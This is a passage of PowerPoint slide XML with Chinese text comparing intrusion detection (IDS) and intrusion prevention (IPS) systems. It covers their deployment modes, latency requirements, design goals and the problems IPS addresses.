              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="AutoShape 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{390E6500-1FCB-1F6D-E9EC-13857FA42BDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1847851" y="1987550"/>
            <a:ext cx="2951163" cy="4319588"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="50000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90000" tIns="46800" rIns="90000" bIns="46800" anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE6B58FE-6F3E-45B4-81EB-4AA1660D3863}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2566988" y="2943225"/>
            <a:ext cx="1511300" cy="503238"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="00CC00"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="00CC00">
                  <a:gamma/>
                  <a:tint val="23922"/>
                  <a:invGamma/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="00CC00"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="18900000" scaled="1"/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="808080"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>入侵检测</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="AutoShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F42F8B9-6D6E-60F9-2DFD-8D16B78509A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8208963" y="2943225"/>
            <a:ext cx="1511300" cy="503238"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF9900"/>
              </a:gs>
              <a:gs pos="50000">
                <a:srgbClr val="FF9900">
                  <a:gamma/>
                  <a:tint val="23922"/>
                  <a:invGamma/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FF9900"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="18900000" scaled="1"/>
          </a:gradFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="35921" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="808080"/>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" kern="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>入侵防御</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" kern="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="000000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>IPS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDC6D7B8-CD84-D658-2701-BA32677C7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8" y="1700214"/>
            <a:ext cx="3097212"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组合 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A520C9-4610-22C8-BA97-649D29B5AB77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2838105" y="4511899"/>
            <a:ext cx="7471410" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="11766" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{180DF504-6E52-1DBD-BDF2-91A8E8744749}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="1082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核心技术基础一致</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="59" name="组合 58">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249FCDFF-F1AC-3477-6288-A26D53C8130B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="67" name="图片 66">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D9E46B-CB5B-7746-3F5A-070C5C5AE8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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3E7952E-7D91-7DAC-92C9-7F6A08865266}"/>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70" name="组合 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3284629F-77D0-83E1-4331-D5A0803A33DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2836070" y="5048590"/>
            <a:ext cx="6848475" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="10785" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5382A86-36A5-579B-9468-52522C661680}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="984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名称非常接近</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="72" name="组合 71">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACCCB63F-398E-61AE-BB5F-07AA05D673F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="73" name="图片 72">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21CEA7A9-7E3B-13C3-4ABE-C61260611E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a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D71C1EE-A87A-A311-20FF-29826BF1DDF4}"/>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93D6A5C4-EEFB-5861-BDCD-7F8DB4A7B638}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2833122" y="5560919"/>
            <a:ext cx="3906520" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="6152" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53FB56BD-6DBE-7058-691A-E584FE116914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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通常厂商同时推出两类产品</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="77" name="组合 76">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2648985B-9974-BC7A-44D4-C7F232A6B9AD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="78" name="图片 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C908C8E-0148-340D-FC2B-A3EF8BA0D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9" name="Rectangle 2">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5E8E7C-A778-D884-F812-057B6436A14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2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD6B228D-539B-4D11-A59D-79159FCF6821}"/>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629979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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8547CA70-C4F6-0780-A356-346F5880151F}"/>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a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pP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部署方式对比</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="40" name="表格 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2C1E92B-455A-398B-F9A1-3E1C90715EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1451475497"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1780016" y="2120337"/>
          <a:ext cx="8631968" cy="3461480"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4316973">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4314995">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="692296">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en-US" altLang="zh-CN"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rPr>
                        <a:t>IPS</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"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endParaRP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en-US" altLang="zh-CN"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rPr>
                        <a:t>IDS</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US"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endParaRP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92296">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在线，流量必须通过</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>IPS</a:t>
                      </a:r>
                      <a:endPar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endParaRP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旁路，通过镜像获得数据</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92296">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实时，其时延必须满足业务要求</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准实时，可接受秒级时延</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92296">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立刻影响网络报文</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对网络及业务无直接影响</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692296">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作用范围有限制</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dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>监控范围广</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="99051" marR="9905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
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D99CF912-741B-4209-AD85-A3BF13E83268}"/>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4229232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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8547CA70-C4F6-0780-A356-346F5880151F}"/>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a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:sysClr val="windowText" lastClr="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设计出发点对比</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="22" name="表格 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F14F06A1-4910-A50C-9698-7D7207FC4D92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3843577116"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1783292" y="2235451"/>
          <a:ext cx="8625415" cy="2698564"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4313695">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4311720">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="674641">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en-US" altLang="zh-CN"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rPr>
                        <a:t>IPS</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                      </a:endParaRP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en-US" altLang="zh-CN" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>IDS</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                        <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                      </a:endParaRP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74641">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en-US" altLang="zh-CN" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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无误报</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无漏报</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74641">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dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>满足峰值流量和时延要求</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满足平均流量，可接受秒级时延</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74641">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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>不能影响业务系统可用性</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1" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPct val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000099"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                          <a:cs typeface="Tahoma" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>只需关注自身功能实现</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="99051" marR="99051" marT="45700" marB="457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sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1625F6A8-C4FF-4B0D-A439-455FBB37E221}"/>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1848490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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8547CA70-C4F6-0780-A356-346F5880151F}"/>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a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pP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IPS</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能够解决的问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56" name="组合 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A520C9-4610-22C8-BA97-649D29B5AB77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1101773" y="2442381"/>
            <a:ext cx="7471410" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="11766" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Rectangle 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{180DF504-6E52-1DBD-BDF2-91A8E8744749}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="1082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阻拦已知攻击（重点）</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
